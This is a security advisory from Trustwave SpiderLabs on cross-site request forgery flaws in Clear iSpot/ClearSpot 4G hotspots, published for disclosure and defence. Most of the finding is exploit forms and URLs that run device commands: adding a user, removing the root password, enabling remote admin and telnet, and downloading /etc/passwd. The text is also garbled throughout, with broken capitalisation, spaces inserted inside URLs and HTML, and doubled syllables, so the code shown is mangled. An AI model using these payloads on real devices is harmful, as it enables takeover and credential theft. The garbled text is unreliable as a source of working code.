Clear iSpot/Clearspot CSRF Vulnerabilities

Trustwaves SpiderLabs Security Advisory TWSL2010-008:
Clear iSpot/Clearspot CSRF Vulnerabilities

Https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt

Published: 2010-12-10 Version: 1.0

Vendor: Clear (http://www.clear.com Products: iSpot/ClearSpot 4G (http://www.clear.com/devices)
Versions affected:
The observed behavior the result of a design choice, and may be present
On multiple versions. The specific versions used during testing are
Given below.

ISpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)]
Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)]
2.0.0.0 [R1786 (Aug 4 2010 20:09:06)]
Firmware Version: 1.9.9.4
Hardware Version: R051.2
Device Name: IMW-C615W
Device Manufacturer: INFOMARK (http://infomark.co.kr
<Http://infomark.co.kr/>)

Product Description:
ISpot and ClearSpot 4G are portable 4G devices, that allow users to share
And broadcast their own personal WiFi network. The device connects up to 8
Clients at the same time, on the same 4G connection.

Credit: Matthew jakuboski of Trustwaves SpiderLabs

CVE-2010-4507 (CVE)

Finding:
These devices are susceptible to Cross-Site Request Forgery (CSRF ).
An attacker that is able to coerce a ClearSpot/iSpot user
Following a link can arbitrarily execute system commands on the device.

The following examples will allow an attacker to enable remote access
The
ISpot and ClearSpot 4G, and add their own account to the device. This level
Of access also provides a devices client-side SSL certificates, which are
Used to perform device authentication. This cocould lead to a compromise
ClearWire accounts as well as other personal information.

Add new user:
<Form method = "post" action = "http: // server/cgi-bin/webmain. cgi ";
<Http: // 192.168.1.1/cgi-bin/webmain. cgi % 22>
<Input type = "hidden" name = "act" value = "act_assist_result">
<Input type = "hidden" name = "cmd" value = "adduser-S jaku">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/webmain. cgi? Act = act_cmd_result & cmd = adduser %
20-S % 20 jaku>

Remove root password:
<Form method = "post" action = "http: // server/cgi-bin/webmain. cgi ";
<Http: // 192.168.1.1/cgi-bin/webmain. cgi % 22>
<Input type = "hidden" name = "act" value = "act_assist_result">
<Input type = "hidden" name = "cmd" value = "passwd-d root">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/webmain. cgi? Act = act_cmd_result & cmd = passwd % 2
0-d % 20 root>

Enable remote administration access:
<Form method = "post" action = "http: // server/cgi-bin/webmain. cgi ";
<Http: // server/cgi-bin/webmain. cgi % 22>
<Input type = "hidden" name = "act" value = "act_network_set">
<Input type = "hidden" name = "enable_remote_access" value = "YES">
<Input type = "hidden" name = "remote_access_port" value = "80">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/webmain. cgi? Act = act_network_set & enable_remo
Te_access = YES & remote_access_port = 80>

Enable telnet if not already enabled:

<Form method = "post" action = "http: // server/cgi-bin/webmain. cgi ";
<Http: // server/cgi-bin/webmain. cgi % 22>
<Input type = "hidden" name = "act" value = "act_set_wimax_etc_config">
<Input type = "hidden" name = "ENABLE_TELNET" value = "YES">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/webmain. cgi? Act = act_set_wimax_etc_config & EN
ABLE_TELNET = YES>

Allow remote telnet access:
<Form method = "post" action = "http: // server/cgi-bin/webmain. cgi ";
<Http: // server/cgi-bin/webmain. cgi % 22>
<Input type = "hidden" name = "act" value = "act_network_set">
<Input type = "hidden" name = "add_enable" value = "YES">
<Input type = "hidden" name = "add_host_ip" value = "1">
<Input type = "hidden" name = "add_port" value = "23">
<Input type = "hidden" name = "add_protocol" value = "BOTH">
<Input type = "hidden" name = "add_memo" value = "admintelnet">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/webmain. cgi? Act = act_network_set & add_enable =
YES & add_host_ip = 1 & add_port = 23 & add_protocol = both & add_memo = admintelnet>

Once compromised, it is possible to download any file from the devices
Using
The following method.

Download/etc/passwd file:
<Form method = "post" action = "http: // server/cgi-bin/upgrademain. cgi
<Http: // server/cgi-bin/upgrademain. cgi> ">
<Input type = "hidden" name = "act" value = "act_file_download">
<Input type = "hidden" name = "METHOD" value = "PATH">
<Input type = "hidden" name = "FILE_PATH" value = "/etc/passwd">
<Input type = "submit">
</Form>

Or

Src = http: // server/cgi-bin/upgrademain. cgi? Act = act_file_download & METHO
D = PATH & FILE_PATH =/etc/passwd>

Vendor Response:
No official response is available at the time of release.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
Network access to these devices shoshould be limited to authorized
Personnel through the use of Access Control Lists and proper
Network segmentation.

Vendor Communication Timeline:
8/26/10-Vendor contact initiated.
9/30/10-Vulnerability details provided to vendor.
12/3/10-Notified vendor of release date. No workaround or patch provided.
12/10/10-Advisory published.

Revision History:
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscribe-based
Information security and payment card industry compliance management
Solutions to businesses and government entities throughout the world.
Organizations faced with todays challenging data security and compliance
Environment, Trustwave provides a unique approach with comprehensive
Solutions that include its flagship TrustKeeper compliance management
Software and other proprietary security solutions. Trustwave has helped
Thousands of organizations -- ranging from Fortune 500 businesses and large
Financial institutions to small and medium-sized retailers -- manage
Compliance and secure their network infrastructure, data communications and
Critical information assets. Trustwave is headquartered in Chicago
Offices t